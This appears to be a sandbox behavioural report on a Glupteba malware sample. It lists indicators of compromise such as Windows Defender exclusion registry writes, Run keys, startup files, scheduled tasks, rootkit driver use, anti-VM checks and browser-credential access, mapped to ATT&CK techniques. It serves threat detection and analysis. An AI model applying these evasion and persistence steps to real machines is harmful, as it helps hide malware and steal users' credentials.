glupteba | 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\FcrfIQnc3MnN2EYixmyTFb6D.exe = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZWaNCawf3dZ4eT3o5QvqYRLW.exe = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	Qw369efixtIBKFp9ZFZ0w0mq.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
3016	netsh.exe
8	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sc.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Control Panel\International\Geo\Nation	wXyVQwS.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lkf1zJCsoFgH8d2hvIzEYlIN.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uzxOe2lyQDhSDaEfvfIKqMBD.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OLIHzbyHLDXijHQYrzdL0a5F.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7y4ACGRZJNzZHbKEvffh0Sns.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4GLBGe0jt1vFHT3XxcZmkibv.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4tQwPV659hlBHDLbTJFNn91R.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CvsYZlzWhRJTuq9jYDiXtMI7.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FM6vIcBAv4EjiqrmhNenpWZ7.bat	InstallUtil.exe

Executes dropped EXE 26 IoCs

pid	Process
4704	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
1124	FcrfIQnc3MnN2EYixmyTFb6D.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
1384	mAIqaeuuMoGky7kZVzMJ1DQQ.exe
1204	zhqw0x5VEifunzipVxSGz3iI.exe
696	EWJZ39UCGs8aWbGUePjQcrz2.exe
748	zhqw0x5VEifunzipVxSGz3iI.exe
4908	zhqw0x5VEifunzipVxSGz3iI.exe
4940	zhqw0x5VEifunzipVxSGz3iI.exe
4272	zhqw0x5VEifunzipVxSGz3iI.exe
2856	NjD3wZxeeWlSx5eQJUW3XsQg.exe
2816	Install.exe
4364	Install.exe
4480	Assistant_103.0.4928.25_Setup.exe_sfx.exe
4372	updater.exe
4908	assistant_installer.exe
3648	assistant_installer.exe
4496	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
4328	cmd.exe
4576	WEYFRYL.exe
2372	wXyVQwS.exe
1344	csrss.exe
4252	injector.exe
4152	windefender.exe
520	windefender.exe
2228	f801950a962ddba14caaa44bf084b55c.exe

Loads dropped DLL 12 IoCs

pid	Process
1204	zhqw0x5VEifunzipVxSGz3iI.exe
748	zhqw0x5VEifunzipVxSGz3iI.exe
4908	zhqw0x5VEifunzipVxSGz3iI.exe
4940	zhqw0x5VEifunzipVxSGz3iI.exe
4272	zhqw0x5VEifunzipVxSGz3iI.exe
696	EWJZ39UCGs8aWbGUePjQcrz2.exe
696	EWJZ39UCGs8aWbGUePjQcrz2.exe
4908	assistant_installer.exe
4908	assistant_installer.exe
3648	assistant_installer.exe
3648	assistant_installer.exe
1048	sc.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000600000001ab9f-57.dat	upx
behavioral2/files/0x000600000001ab9f-58.dat	upx
behavioral2/files/0x000600000001ab9f-69.dat	upx
behavioral2/files/0x000600000001abb1-72.dat	upx
behavioral2/memory/748-63-0x0000000001280000-0x00000000017CD000-memory.dmp	upx
behavioral2/memory/1204-52-0x0000000001280000-0x00000000017CD000-memory.dmp	upx
behavioral2/files/0x000600000001ab9f-43.dat	upx
behavioral2/memory/4908-79-0x0000000000A50000-0x0000000000F9D000-memory.dmp	upx
behavioral2/files/0x000600000001ab9f-82.dat	upx
behavioral2/memory/4940-86-0x0000000001280000-0x00000000017CD000-memory.dmp	upx
behavioral2/files/0x000600000001ab9f-87.dat	upx
behavioral2/memory/4272-119-0x0000000001280000-0x00000000017CD000-memory.dmp	upx
behavioral2/memory/1204-173-0x0000000001280000-0x00000000017CD000-memory.dmp	upx
behavioral2/memory/4940-196-0x0000000001280000-0x00000000017CD000-memory.dmp	upx

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZWaNCawf3dZ4eT3o5QvqYRLW.exe = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\FcrfIQnc3MnN2EYixmyTFb6D.exe = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	cmd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	wXyVQwS.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	wXyVQwS.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	wXyVQwS.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	zhqw0x5VEifunzipVxSGz3iI.exe
File opened (read-only)	\??\F:	zhqw0x5VEifunzipVxSGz3iI.exe
File opened (read-only)	\??\D:	zhqw0x5VEifunzipVxSGz3iI.exe
File opened (read-only)	\??\F:	zhqw0x5VEifunzipVxSGz3iI.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 45 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	windefender.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB	wXyVQwS.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	wXyVQwS.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F	wXyVQwS.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	sc.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	WEYFRYL.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	Conhost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	rundll32.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	wXyVQwS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7	wXyVQwS.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	WEYFRYL.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	wXyVQwS.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3792 set thread context of 3748	3792	85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe	70
PID 4372 set thread context of 4564	4372	updater.exe	237
PID 4372 set thread context of 2532	4372	updater.exe	238

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
File opened (read-only)	\??\VBoxMiniRdrDN	cmd.exe

Drops file in Program Files directory 15 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\KrPQunXfXpAVC\jNcfuKN.xml	wXyVQwS.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	wXyVQwS.exe
File created	C:\Program Files (x86)\DlbZONUGhjVU2\NnXXDql.xml	wXyVQwS.exe
File created	C:\Program Files (x86)\oVhJPNkDU\exZibaI.xml	wXyVQwS.exe
File created	C:\Program Files (x86)\oVhJPNkDU\kunRDm.dll	wXyVQwS.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	wXyVQwS.exe
File created	C:\Program Files (x86)\DlbZONUGhjVU2\TkhuHnMRVDOmk.dll	wXyVQwS.exe
File created	C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\IaNaHPT.dll	wXyVQwS.exe
File created	C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\XdocruQ.xml	wXyVQwS.exe
File created	C:\Program Files\Google\Chrome\updater.exe	Qw369efixtIBKFp9ZFZ0w0mq.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	wXyVQwS.exe
File created	C:\Program Files (x86)\KrPQunXfXpAVC\wApqRvu.dll	wXyVQwS.exe
File created	C:\Program Files (x86)\GpfcWYRxKqUn\BshyzsP.dll	wXyVQwS.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	wXyVQwS.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	wXyVQwS.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job	gpscript.exe
File opened for modification	C:\Windows\rss	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
File created	C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job	schtasks.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job	schtasks.exe
File created	C:\Windows\Tasks\ztlTbPYifermRZH.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
File opened for modification	C:\Windows\rss	cmd.exe
File created	C:\Windows\rss\csrss.exe	cmd.exe
File created	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1048	sc.exe
2612	sc.exe
2780	sc.exe
2444	sc.exe
3972	sc.exe
3644	sc.exe
3264	sc.exe
4220	sc.exe
5060	sc.exe
4236	sc.exe
4204	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	EWJZ39UCGs8aWbGUePjQcrz2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EWJZ39UCGs8aWbGUePjQcrz2.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
320	schtasks.exe
3156	schtasks.exe
3640	schtasks.exe
1836	schtasks.exe
5012	schtasks.exe
3308	schtasks.exe
4076	schtasks.exe
3504	schtasks.exe
3396	schtasks.exe
2612	schtasks.exe
3892	schtasks.exe
3492	schtasks.exe
3144	schtasks.exe
4624	schtasks.exe
4312	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4124	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	sc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	sc.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-12 = "Azores Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	rundll32.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	Conhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	rundll32.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	rundll32.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	windefender.exe
